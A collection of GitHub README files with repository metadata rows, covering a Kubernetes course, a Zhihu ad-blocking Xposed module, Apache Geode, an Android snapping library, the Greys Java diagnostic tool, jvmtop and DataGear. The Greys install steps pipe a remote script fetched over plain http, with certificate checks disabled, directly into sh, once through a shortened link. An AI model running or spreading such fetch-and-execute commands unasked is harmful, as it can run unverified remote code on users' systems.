AWS Code Services like CodeCommit, CodeBuild and CodePipeline - You will implement microservices core cocepts like Service Discovery, Distributed Tracing using X-Ray and Canary Deployments - You will learn to enable Autoscaling features like HPA,VPA and Cluster Autoscaler - You will learn to enable monitoring and logging for EKS cluster and workloads in cluster using CloudWatch Container Insights - You will learn Docker fundamentals by implementing usecases like download image from Docker Hub and run on local desktop and build an image locally, test and push to Docker Hub. - You will slowly start by learning Docker Fundamentals and move on to Kubenetes. - You will master many kubectl commands over the process ## Are there any course requirements or prerequisites? - You must have an AWS account to follow with me for hands-on activities. - You dont need to have any basic Docker or kubernetes knowledge to start this course. ## Who are your target students? - AWS Architects or Sysadmins or Developers who are planning to master Elastic Kubernetes Service (EKS) for running applications on Kubernetes - Any beginner who is interested in learning kubernetes on cloud using AWS EKS. - Any beginner who is interested in learning Kubernetes DevOps and Microservices deployments on Kubernetes ## Each of my courses come with - Amazing Hands-on Step By Step Learning Experiences - Real Implementation Experience - Friendly Support in the Q&A section - 30 Day "No Questions Asked" Money Back Guarantee! ## My Other AWS Courses - [Udemy Enroll](https://github.com/stacksimplify/udemy-enroll) ## Stack Simplify Udemy Profile - [Udemy Profile](https://www.udemy.com/user/kalyan-reddy-9/) # Azure Kubernetes Service with Azure DevOps and Terraform [![Image](https://stacksimplify.com/course-images/azure-kubernetes-service-with-azure-devops-and-terraform.png "Azure Kubernetes Service with Azure DevOps and Terraform")](https://www.udemy.com/course/azure-kubernetes-service-with-azure-devops-and-terraform/?referralCode=2499BF7F5FAAA506ED42)
0
shatyuka/Zhiliao
知乎去广告Xposed模块
xposed zhihu zhiliao
# 知了 知乎去广告Xposed模块 [![Chat](https://img.shields.io/badge/Telegram-Chat-blue.svg?logo=telegram)](https://t.me/joinchat/OibCWxbdCMkJ2fG8J1DpQQ) [![Subscribe](https://img.shields.io/badge/Telegram-Subscribe-blue.svg?logo=telegram)](https://t.me/zhiliao) [![Download](https://img.shields.io/github/v/release/shatyuka/Zhiliao?label=Download)](https://github.com/shatyuka/Zhiliao/releases/latest) [![Stars](https://img.shields.io/github/stars/shatyuka/Zhiliao?label=Stars)](https://github.com/shatyuka/Zhiliao) [![License](https://img.shields.io/github/license/shatyuka/Zhiliao?label=License)](https://choosealicense.com/licenses/gpl-3.0/) ## 功能 - 广告 - 去启动页广告 - 去信息流广告 - 去回答列表广告 - 去评论广告 - 去分享广告 - 去回答底部广告 - 去搜索广告 - 其他 - 过滤视频 - 过滤文章 - 去信息流会员推荐 - 去回答圈子 - 去商品推荐 - 去相关搜索 - 去关键字搜索 - 直接打开外部链接 - 禁止切换色彩模式 - 显示卡片类别 - 状态栏沉浸 - 禁止进入全屏模式 - 解锁第三方登录 - 界面净化 - 移除直播按钮 - 不显示小红点 - 隐藏会员卡片 - 隐藏热点通知 - 精简文章页面 - 隐藏置顶热门 - 隐藏混合卡片 - 导航栏 - 隐藏会员按钮 - 隐藏视频按钮 - 隐藏关注按钮 - 隐藏发布按钮 - 隐藏发现按钮 - 禁用活动主题 - 隐藏导航栏突起 - 左右划 - 左右划切换回答 - 移除下一个回答按钮 - 自定义过滤 - 注入JS脚本 - 清理临时文件 ## 帮助 [Github Wiki](https://github.com/shatyuka/Zhiliao/wiki) ## 下载 [Github Release](https://github.com/shatyuka/Zhiliao/releases/latest) [Xposed Repo](https://repo.xposed.info/module/com.shatyuka.zhiliao) [蓝奏云](https://wwa.lanzoux.com/b00tscbwd) 密码:1hax ## License This project is licensed under the [GNU General Public Licence, version 3](https://choosealicense.com/licenses/gpl-3.0/).
0
apache/geode
Apache Geode
apache datagrid geode
<div align="center"> [![Apache Geode logo](https://geode.apache.org/img/Apache_Geode_logo.png)](http://geode.apache.org) [![Build Status](https://concourse.apachegeode-ci.info/api/v1/teams/main/pipelines/apache-develop-main/badge)](https://concourse.apachegeode-ci.info/teams/main/pipelines/apache-develop-main) [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://www.apache.org/licenses/LICENSE-2.0) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.apache.geode/geode-core/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22) [![homebrew](https://img.shields.io/homebrew/v/apache-geode.svg)](https://formulae.brew.sh/formula/apache-geode) [![Docker Pulls](https://img.shields.io/docker/pulls/apachegeode/geode.svg)](https://hub.docker.com/r/apachegeode/geode/) [![Total alerts](https://img.shields.io/lgtm/alerts/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/alerts/) [![Language grade: Java](https://img.shields.io/lgtm/grade/java/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:java) [![Language grade: JavaScript](https://img.shields.io/lgtm/grade/javascript/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:javascript) [![Language grade: Python](https://img.shields.io/lgtm/grade/python/g/apache/geode.svg?logo=lgtm&logoWidth=18)](https://lgtm.com/projects/g/apache/geode/context:python) </div> ## Contents 1. [Overview](#overview) 2. [How to Get Apache Geode](#obtaining) 3. [Main Concepts and Components](#concepts) 4. [Location of Directions for Building from Source](#building) 5. [Geode in 5 minutes](#started) 6. [Application Development](#development) 7. [Documentation](https://geode.apache.org/docs/) 8. [Wiki](https://cwiki.apache.org/confluence/display/GEODE/Index) 9. [How to Contribute](https://cwiki.apache.org/confluence/display/GEODE/How+to+Contribute) 10. [Export Control](#export) ## <a name="overview"></a>Overview [Apache Geode](http://geode.apache.org/) is a data management platform that provides real-time, consistent access to data-intensive applications throughout widely distributed cloud architectures. Apache Geode pools memory, CPU, network resources, and optionally local disk across multiple processes to manage application objects and behavior. It uses dynamic replication and data partitioning techniques to implement high availability, improved performance, scalability, and fault tolerance. In addition to being a distributed data container, Apache Geode is an in-memory data management system that provides reliable asynchronous event notifications and guaranteed message delivery. Apache Geode is a mature, robust technology originally developed by GemStone Systems. Commercially available as GemFire™, it was first deployed in the financial sector as the transactional, low-latency data engine used in Wall Street trading platforms. Today Apache Geode technology is used by hundreds of enterprise customers for high-scale business applications that must meet low latency and 24x7 availability requirements. ## <a name="obtaining"></a>How to Get Apache Geode You can download Apache Geode from the [website](https://geode.apache.org/releases/), run a Docker [image](https://hub.docker.com/r/apachegeode/geode/), or install with [Homebrew](https://formulae.brew.sh/formula/apache-geode) on OSX. Application developers can load dependencies from [Maven Central](https://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.apache.geode%22). Maven ```xml <dependencies> <dependency> <groupId>org.apache.geode</groupId> <artifactId>geode-core</artifactId> <version>$VERSION</version> </dependency> </dependencies> ``` Gradle ```groovy dependencies { compile "org.apache.geode:geode-core:$VERSION" } ``` ## <a name="concepts"></a>Main Concepts and Components _Caches_ are an abstraction that describe a node in an Apache Geode distributed system. Within each cache, you define data _regions_. Data regions are analogous to tables in a relational database and manage data in a distributed fashion as name/value pairs. A _replicated_ region stores identical copies of the data on each cache member of a distributed system. A _partitioned_ region spreads the data among cache members. After the system is configured, client applications can access the distributed data in regions without knowledge of the underlying system architecture. You can define listeners to receive notifications when data has changed, and you can define expiration criteria to delete obsolete data in a region. _Locators_ provide clients with both discovery and server load balancing services. Clients are configured with locator information, and the locators maintain a dynamic list of member servers. The locators provide clients with connection information to a server. Apache Geode includes the following features: * Combines redundancy, replication, and a "shared nothing" persistence architecture to deliver fail-safe reliability and performance. * Horizontally scalable to thousands of cache members, with multiple cache topologies to meet different enterprise needs. The cache can be distributed across multiple computers. * Asynchronous and synchronous cache update propagation. * Delta propagation distributes only the difference between old and new versions of an object (delta) instead of the entire object, resulting in significant distribution cost savings. * Reliable asynchronous event notifications and guaranteed message delivery through optimized, low latency distribution layer. * Data awareness and real-time business intelligence. If data changes as you retrieve it, you see the changes immediately. * Integration with Spring Framework to speed and simplify the development of scalable, transactional enterprise applications. * JTA compliant transaction support. * Cluster-wide configurations that can be persisted and exported to other clusters. * Remote cluster management through HTTP. * REST APIs for REST-enabled application development. * Rolling upgrades may be possible, but they will be subject to any limitations imposed by new features. ## <a name="building"></a>Building this Release from Source See [BUILDING.md](./BUILDING.md) for instructions on how to build the project. ## <a name="testing"></a>Running Tests See [TESTING.md](./TESTING.md) for instructions on how to run tests. ## <a name="started"></a>Geode in 5 minutes Geode requires installation of JDK version 1.8. After installing Apache Geode, start a locator and server: ```console $ gfsh gfsh> start locator gfsh> start server ``` Create a region: ```console gfsh> create region --name=hello --type=REPLICATE ``` Write a client application (this example uses a [Gradle](https://gradle.org) build script): _build.gradle_ ```groovy apply plugin: 'java' apply plugin: 'application' mainClassName = 'HelloWorld' repositories { mavenCentral() } dependencies { compile 'org.apache.geode:geode-core:1.4.0' runtime 'org.slf4j:slf4j-log4j12:1.7.24' } ``` _src/main/java/HelloWorld.java_ ```java import java.util.Map; import org.apache.geode.cache.Region; import org.apache.geode.cache.client.*; public class HelloWorld { public static void main(String[] args) throws Exception { ClientCache cache = new ClientCacheFactory() .addPoolLocator("localhost", 10334) .create(); Region<String, String> region = cache .<String, String>createClientRegionFactory(ClientRegionShortcut.CACHING_PROXY) .create("hello"); region.put("1", "Hello"); region.put("2", "World"); for (Map.Entry<String, String> entry : region.entrySet()) { System.out.format("key = %s, value = %s\n", entry.getKey(), entry.getValue()); } cache.close(); } } ``` Build and run the `HelloWorld` example: ```console $ gradle run ``` The application will connect to the running cluster, create a local cache, put some data in the cache, and print the cached data to the console: ```console key = 1, value = Hello key = 2, value = World ``` Finally, shutdown the Geode server and locator: ```console gfsh> shutdown --include-locators=true ``` For more information see the [Geode Examples](https://github.com/apache/geode-examples) repository or the [documentation](https://geode.apache.org/docs/). ## <a name="development"></a>Application Development Apache Geode applications can be written in these client technologies: * Java [client](https://geode.apache.org/docs/guide/18/topologies_and_comm/cs_configuration/chapter_overview.html) or [peer](https://geode.apache.org/docs/guide/18/topologies_and_comm/p2p_configuration/chapter_overview.html) * [REST](https://geode.apache.org/docs/guide/18/rest_apps/chapter_overview.html) * [Memcached](https://cwiki.apache.org/confluence/display/GEODE/Moving+from+memcached+to+gemcached) The following libraries are available external to the Apache Geode project: * [Spring Data GemFire](https://projects.spring.io/spring-data-gemfire/) * [Spring Cache](https://docs.spring.io/spring/docs/current/spring-framework-reference/html/cache.html) * [Python](https://github.com/gemfire/py-gemfire-rest) ## <a name="export"></a>Export Control This distribution includes cryptographic software. The country in which you currently reside may have restrictions on the import, possession, use, and/or re-export to another country, of encryption software. BEFORE using any encryption software, please check your country's laws, regulations and policies concerning the import, possession, or use, and re-export of encryption software, to see if this is permitted. See <http://www.wassenaar.org/> for more information. The U.S. Government Department of Commerce, Bureau of Industry and Security (BIS), has classified this software as Export Commodity Control Number (ECCN) 5D002.C.1, which includes information security software using or performing cryptographic functions with asymmetric algorithms. The form and manner of this Apache Software Foundation distribution makes it eligible for export under the License Exception ENC Technology Software Unrestricted (TSU) exception (see the BIS Export Administration Regulations, Section 740.13) for both object code and source code. The following provides more details on the included cryptographic software: * Apache Geode is designed to be used with [Java Secure Socket Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/jsse/JSSERefGuide.html) (JSSE) and [Java Cryptography Extension](https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html) (JCE). The [JCE Unlimited Strength Jurisdiction Policy](https://www.oracle.com/technetwork/java/javase/downloads/jce8-download-2133166.html) may need to be installed separately to use keystore passwords with 7 or more characters. * Apache Geode links to and uses [OpenSSL](https://www.openssl.org/) ciphers.
0
rubensousa/GravitySnapHelper
A SnapHelper that snaps a RecyclerView to an edge.
recyclerview snapping
# GravitySnapHelper A SnapHelper that snaps a RecyclerView to an edge. ## Setup Add this to your build.gradle: ```groovy implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2' ``` ## How to use You can either create a GravitySnapHelper, or use GravitySnapRecyclerView. If you want to use GravitySnapHelper directly, you just need to create it and attach it to your RecyclerView: ```kotlin val snapHelper = GravitySnapHelper(Gravity.START) snapHelper.attachToRecyclerView(recyclerView) ``` If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation: ```xml <attr name="snapGravity" format="enum"> <attr name="snapEnabled" format="boolean" /> <attr name="snapLastItem" format="boolean" /> <attr name="snapToPadding" format="boolean" /> <attr name="snapScrollMsPerInch" format="float" /> <attr name="snapMaxFlingSizeFraction" format="float" /> ``` Example: ```xml <com.github.rubensousa.gravitysnaphelper.GravitySnapRecyclerView android:id="@+id/recyclerView" android:layout_width="match_parent" android:layout_height="wrap_content" app:snapGravity="start" /> ``` ## Start snapping ```kotlin val snapHelper = GravitySnapHelper(Gravity.START) snapHelper.attachToRecyclerView(recyclerView) ``` <img src="screens/snap_start.gif" width=350></img> ## Center snapping ```kotlin val snapHelper = GravitySnapHelper(Gravity.CENTER) snapHelper.attachToRecyclerView(recyclerView) ``` <img src="screens/snap_center.gif" width=350></img> ## Limiting fling distance If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance** you can change the maximum fling distance allowed. <img src="screens/snap_fling.gif" width=350></img> ## With decoration <img src="screens/snap_decoration.gif" width=350></img> ## Features 1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed. 2. **setScrollMsPerInch** - changes the scroll speed. 3. **setGravity** - changes the gravity of the SnapHelper. 4. **setSnapToPadding** - enables snapping to padding (default is false) 5. **smoothScrollToPosition** and **scrollToPosition** 6. RTL support out of the box ## Nested RecyclerViews Take a look at these blog posts if you're using nested RecyclerViews 1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/) 2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/) ## License Copyright 2018 The Android Open Source Project Copyright 2019 Rúben Sousa Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
0
oldmanpushcart/greys-anatomy
Java诊断工具
diagnosis greys jvmti troubleshooting
![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png) > 线上系统为何经常出错?数据库为何屡遭黑手?业务调用为何频频失败?连环异常堆栈案,究竟是哪次调用所为? 数百台服务器意外雪崩背后又隐藏着什么?是软件的扭曲还是硬件的沦丧? 走进科学带你了解Greys, Java线上问题诊断工具。 # 相关文档 * [关于软件](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home) * [程序安装](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing) * [入门说明](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started) * [常见问题](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ) * [更新记事](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle) * [详细文档](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf) * [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md) # 程序安装 - 远程安装 ```shell curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh ``` - 远程安装(短链接) ```shell curl -sLk http://t.cn/R2QbHFc|sh ``` ## 最新版本 ### **VERSION :** 1.7.6.6 1. 支持JDK9 2. greys.sh脚本支持tar的解压缩模式(有些机器没有unzip),默认unzip 3. 修复 #219 问题 ### 版本号说明 `主版本`.`大版本`.`小版本`.`漏洞修复` * 主版本 这个版本更新说明程序架构体系进行了重大升级,比如之前的0.1版升级到1.0版本,整个软件的架构从单机版升级到了SOCKET多机版。并将Greys的性质进行的确定:Java版的HouseMD,但要比前辈们更强。 * 大版本 程序的架构设计进行重大改造,但不影响用户对这款软件的定位。 * 小版本 增加新的命令和功能 * 漏洞修复 对现有版本进行漏洞修复和增强 - `主版本`、`大版本`、之间不做任何向下兼容的承诺,即`0.1`版本的Client不保证一定能正常访问`1.0`版本的Server。 - `小版本`不兼容的版本会在版本升级中指出 - `漏洞修复`保证向下兼容 # 维护者 * [李夏驰](http://www.weibo.com/vlinux) * [姜小逸又胖了](http://weibo.com/chengtd) # 程序编译 - 打开终端 ```shell git clone git@github.com:oldmanpushcart/greys-anatomy.git cd greys-anatomy/bin ./greys-packages.sh ``` - 程序执行 在`target/`目录下生成对应版本的release文件,比如当前版本是`1.7.0.4`,则生成文件`target/greys-1.7.0.4-bin.zip` 程序在本地编译时会主动在本地安装当前编译的版本,所以编译完成后即相当在本地完成了安装。 # 写在后边 ## 心路感悟 我编写和维护这款软件已经5年了,5年中Greys也从`0.1`版本一直重构到现在的`1.7`。在这个过程中我得到了许多人的帮助与建议,并在年底我计划发布`2.0`版本,将开放Greys的底层通讯协议,支持websocket访问。 多年的问题排查经验我没有过多的分享,一个Java程序员个中的苦闷也无从分享,一切我都融入到了这款软件的命令中,希望这些沉淀能帮助到可能需要到的你少走一些弯路,同时我也非常期待你们对她的反馈,这样我将感到非常开心和有成就感。 ## 帮助我们 Greys的成长需要大家的帮助。 - **分享你使用Greys的经验** 我非常希望能得到大家的使用反馈和经验分享,如果你有,请将分享文章敏感信息脱敏之后邮件给我:[oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com),我将会分享给更多的同行。 - **帮助我完善代码或文档** 一款软件再好,也需要详细的帮助文档;一款软件再完善,也有很多坑要埋。今天我的精力非常有限,希望能得到大家共同的帮助。 - **如果你喜欢这款软件,欢迎打赏一杯咖啡** 嗯,说实话,我是指望用这招来买辆玛莎拉蒂...当然是个玩笑~你们的鼓励将会是我的动力,钱不在乎多少,重要的是我将能从中得到大家善意的反馈,这将会是我继续前进的动力。 ![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png) ## 联系我们 有问题阿里同事可以通过旺旺找到我,阿里外的同事可以通过[我的微博](http://weibo.com/vlinux)联系到我。今晚的杭州大雪纷飞,明天西湖应该非常的美丽,大家晚安。 菜鸟-杜琨(dukun@alibaba-inc.com)
0
opensourceBIM/BIMserver
The open source BIMserver platform
bim bim-applications bim-bots bim-server bimserver buildingsmart ifc java openbim
BIMserver ========= The Building Information Model server (short: BIMserver) enables you to store and manage the information of a construction (or other building related) project. Data is stored in the open data standard IFC. The BIMserver is not a fileserver, but it uses a model-driven architecture approach. This means that IFC data is stored as objects. You could see BIMserver as an IFC database, with special extra features like model checking, versioning, project structures, merging, etc. The main advantage of this approach is the ability to query, merge and filter the BIM-model and generate IFC output (i.e. files) on the fly. Thanks to its multi-user support, multiple people can work on their own part of the dataset, while the complete dataset is updated on the fly. Other users can get notifications when the model (or a part of it) is updated. BIMserver is built for developers. We've got a great wiki on https://github.com/opensourceBIM/BIMserver/wiki and are very active supporting developers on https://github.com/opensourceBIM/BIMserver/issues (C) Copyright by the contributers / BIMserver.org Licence: GNU Affero General Public License, version 3 (see http://www.gnu.org/licenses/agpl-3.0.html) Beware: this project makes intensive use of several other projects with different licenses. Some plugins and libraries are published under a different license.
0
patric-r/jvmtop
Java monitoring for the command-line, profiler included
null
<b>jvmtop</b> is a lightweight console application to monitor all accessible, running jvms on a machine.<br> In a top-like manner, it displays <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>JVM internal metrics</a> (e.g. memory information) of running java processes.<br> <br> Jvmtop does also include a <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ConsoleProfiler.md'>CPU console profiler</a>.<br> <br> It's tested with different releases of Oracle JDK, IBM JDK and OpenJDK on Linux, Solaris, FreeBSD and Windows hosts.<br> Jvmtop requires a JDK - a JRE will not suffice.<br> <br> Please note that it's currently in an alpha state -<br> if you experience an issue or need further help, please <a href='https://github.com/patric-r/jvmtop/issues'>let us know</a>.<br> <br> Jvmtop is open-source. Checkout the <a href='https://github.com/patric-r/jvmtop'>source code</a>. Patches are very welcome!<br> <br> Also have a look at the <a href='https://github.com/patric-r/jvmtop/blob/master/doc/Documentation.md'>documentation</a> or at a <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>captured live-example</a>.<br> ``` JvmTop 0.8.0 alpha amd64 8 cpus, Linux 2.6.32-27, load avg 0.12 https://github.com/patric-r/jvmtop PID MAIN-CLASS HPCUR HPMAX NHCUR NHMAX CPU GC VM USERNAME #T DL 3370 rapperSimpleApp 165m 455m 109m 176m 0.12% 0.00% S6U37 web 21 11272 ver.resin.Resin [ERROR: Could not attach to VM] 27338 WatchdogManager 11m 28m 23m 130m 0.00% 0.00% S6U37 web 31 19187 m.jvmtop.JvmTop 20m 3544m 13m 130m 0.93% 0.47% S6U37 web 20 16733 artup.Bootstrap 159m 455m 166m 304m 0.12% 0.00% S6U37 web 46 ``` <hr /> <h3>Installation</h3> Click on the <a href="https://github.com/patric-r/jvmtop/releases"> releases tab</a>, download the most recent tar.gz archive. Extract it, ensure that the `JAVA_HOME` environment variable points to a valid JDK and run `./jvmtop.sh`.<br><br> Further information can be found in the [INSTALL file](https://github.com/patric-r/jvmtop/blob/master/INSTALL) <h3>08/14/2013 jvmtop 0.8.0 released</h3> <b>Changes:</b> <ul><li>improved attach compatibility for all IBM jvms<br> </li><li>fixed wrong CPU/GC values for IBM J9 jvms<br> </li><li>in case of unsupported heap size metric retrieval, n/a will be displayed instead of 0m<br> </li><li>improved argument parsing, support for short-options, added help (pass <code>--help</code>), see <a href='https://github.com/patric-r/jvmtop/issues/28'>issue #28</a> (now using the great <a href='http://pholser.github.io/jopt-simple'>jopt-simple</a> library)<br> </li><li>when passing the <code>--once</code> option, terminal will not be cleared anymore (see <a href='https://github.com/patric-r/jvmtop/issues/27'>issue #27</a>)<br> </li><li>improved shell script for guessing the path if a <code>JAVA_HOME</code> environment variable is not present (thanks to <a href='https://groups.google.com/forum/#!topic/jvmtop-discuss/KGg_WpL_yAU'>Markus Kolb</a>)</li></ul> <a href='https://github.com/patric-r/jvmtop/blob/master/doc/Changelog.md'>Full changelog</a> <hr /> In <a href='https://github.com/patric-r/jvmtop/blob/master/doc/ExampleOutput.md'>VM detail mode</a> it shows you the top CPU-consuming threads, beside detailed metrics:<br> <br> <br> ``` JvmTop 0.8.0 alpha amd64, 4 cpus, Linux 2.6.18-34 https://github.com/patric-r/jvmtop PID 3539: org.apache.catalina.startup.Bootstrap ARGS: start VMARGS: -Djava.util.logging.config.file=/home/webserver/apache-tomcat-5.5[...] VM: Sun Microsystems Inc. Java HotSpot(TM) 64-Bit Server VM 1.6.0_25 UP: 869:33m #THR: 106 #THRPEAK: 143 #THRCREATED: 128020 USER: webserver CPU: 4.55% GC: 3.25% HEAP: 137m / 227m NONHEAP: 75m / 304m TID NAME STATE CPU TOTALCPU BLOCKEDBY 25 http-8080-Processor13 RUNNABLE 4.55% 1.60% 128022 RMI TCP Connection(18)-10.101. RUNNABLE 1.82% 0.02% 36578 http-8080-Processor164 RUNNABLE 0.91% 2.35% 36453 http-8080-Processor94 RUNNABLE 0.91% 1.52% 27 http-8080-Processor15 RUNNABLE 0.91% 1.81% 14 http-8080-Processor2 RUNNABLE 0.91% 3.17% 128026 JMX server connection timeout TIMED_WAITING 0.00% 0.00% ``` <a href='https://github.com/patric-r/jvmtop/issues'>Pull requests / bug reports</a> are always welcome.<br> <br>
0
datageartech/datagear
数据可视化分析平台,自由制作任何您想要的数据看板
bi business-intelligence chart data-analysis data-analytics data-visualization echarts
<p align="center"> <a href="http://www.datagear.tech"><img src="datagear-web/src/main/resources/org/datagear/web/static/theme/blue/image/logo.png" alt="DataGear" /></a> </p> <h1 align="center"> 数据可视化分析平台 </h1> <h2 align="center"> 自由制作任何您想要的数据看板 </h2> # 简介 DataGear是一款开源免费的数据可视化分析平台,自由制作任何您想要的数据看板,支持接入SQL、CSV、Excel、HTTP接口、JSON等多种数据源。 ## [DataGear 4.7.0 已发布,欢迎官网下载使用!](http://www.datagear.tech) ## [DataGear专业版 1.0.0 正式发布,欢迎试用!](http://www.datagear.tech/pro/) # 特点 - 友好接入的数据源 <br>支持运行时接入任意提供JDBC驱动的数据库,包括MySQL、Oracle、PostgreSQL、SQL Server等关系数据库,以及Elasticsearch、ClickHouse、Hive等大数据引擎 - 多样动态的数据集 <br>支持创建SQL、CSV、Excel、HTTP接口、JSON数据集,并可设置为动态的参数化数据集,可定义文本框、下拉框、日期框、时间框等类型的数据集参数,灵活筛选满足不同业务需求的数据 - 强大丰富的数据图表 <br>数据图表可聚合绑定多个不同格式的数据集,轻松定义同比、环比图表,内置折线图、柱状图、饼图、地图、雷达图、漏斗图、散点图、K线图、桑基图等70+开箱即用的图表,并且支持自定义图表配置项,支持编写和上传自定义图表插件 - 自由开放的数据看板 <br>数据看板采用原生的HTML网页作为模板,支持导入任意HTML网页,支持以可视化方式进行看板设计和编辑,也支持使用JavaScript、CSS等web前端技术自由编辑看板源码,内置丰富的API,可制作图表联动、数据钻取、异步加载、交互表单等个性化的数据看板。 # 功能 ![screenshot/architecture.png](screenshot/architecture.png) # 官网 [http://www.datagear.tech](http://www.datagear.tech) # 界面 数据源管理 ![screenshot/datasource-manage.png](screenshot/datasource-manage.png) SQL数据集 ![screenshot/add-sql-dataset.png](screenshot/add-sql-dataset.png) 看板编辑 ![screenshot/dashboard-visual-mode.gif](screenshot/dashboard-visual-mode.gif) 看板展示 ![screenshot/template-006-dg.png](screenshot/template-006-dg.png) 看板展示-图表联动 ![screenshot/dashboard-map-chart-link.gif](screenshot/dashboard-map-chart-link.gif) 看板展示-实时图表 ![screenshot/dashboard-time-series-chart.gif](screenshot/dashboard-time-series-chart.gif) 看板展示-钻取 ![screenshot/dashboard-map-chart-hierarchy.gif](screenshot/dashboard-map-chart-hierarchy.gif) 看板展示-表单 ![screenshot/dashboard-form.gif](screenshot/dashboard-form.gif) 看板展示-联动异步加载图表 ![screenshot/dashboard-link-load-chart.gif](screenshot/dashboard-link-load-chart.gif) # 技术栈(前后端一体) - 后端 <br> Spring Boot、Mybatis、Freemarker、Derby、Jackson、Caffeine、Spring Security - 前端 <br> jQuery、Vue3、PrimeVue、CodeMirror、ECharts、DataTables # 模块介绍 - datagear-analysis <br>数据分析底层模块,定义数据集、图表、看板API - datagear-connection <br>数据库连接支持模块,定义可从指定目录加载JDBC驱动、新建连接的API - datagear-dataexchange <br>数据导入/导出底层模块,定义导入/导出指定数据源数据的API - datagear-management <br>系统业务服务模块,定义数据源、数据分析等功能的服务层API - datagear-meta <br>数据源元信息底层模块,定义解析指定数据源表结构的API - datagear-persistence <br>数据源数据管理底层模块,定义读取、编辑、查询数据源表数据的API - datagear-util <br>系统常用工具集模块 - datagear-web <br>系统web模块,定义web控制器、操作页面 - datagear-webapp <br>系统web应用模块,定义程序启动类 # 依赖 Java 8+ Servlet 3.1+ # 编译 ## 准备单元测试环境 1. 安装`MySQL-8.0`数据库,并将`root`用户的密码设置为:`root`(或者修改`test/config/jdbc.properties`配置) 2. 新建测试数据库,名称取为:`dg_test` 3. 使用`test/sql/test-mysql.sql`脚本初始化`dg_test`库 ## 执行编译命令 mvn clean package 或者,也可不准备单元测试环境,直接执行如下编译命令: mvn clean package -DskipTests 编译完成后,将在`datagear-webapp/target/datagear-[version]-packages/`内生成程序包。 # 调试 1. 将`datagear`以maven工程导入至IDE工具 2. 以调试模式运行`datagear-webapp`模块的启动类`org.datagear.webapp.DataGearApplication` 3. 打开浏览器,输入:`http://localhost:50401` ## 调试注意 在调试开发分支前(`dev-*`),建议先备份DataGear工作目录(`[用户主目录]/.datagear`), 因为开发分支程序启动时会修改DataGear工作目录,可能会导致先前使用的正式版程序、以及后续发布的正式版程序无法正常启动。 系统启动时会根据当前版本号自动升级内置数据库(Derby数据库,位于`[用户主目录]/.datagear/derby`目录下),且成功后下次启动时不再自动执行,如果调试时遇到数据库异常,需要查看 datagear-management/src/main/resources/org/datagear/management/ddl/datagear.sql 文件,从中查找需要更新的SQL语句,手动执行。 然后,手动执行下面更新系统版本号的SQL语句: UPDATE DATAGEAR_VERSION SET VERSION_VALUE='当前版本号' 例如,对于`4.6.0`版本,应执行: UPDATE DATAGEAR_VERSION SET VERSION_VALUE='4.6.0' 系统自带了一个可用于为内置数据库执行SQL语句的简单工具类`org.datagear.web.util.DerbySqlClient`,可以在IDE中直接运行。注意:运行前需要先停止DataGear程序。 # 版权和许可 Copyright 2018-2023 datagear.tech DataGear is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. DataGear is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with DataGear. If not, see <https://www.gnu.org/licenses/>.
0
aaberg/sql2o
sql2o is a small library, which makes it easy to convert the result of your sql-statements into objects. No resultset hacking required. Kind of like an orm, but without the sql-generation capabilities. Supports named parameters.
null
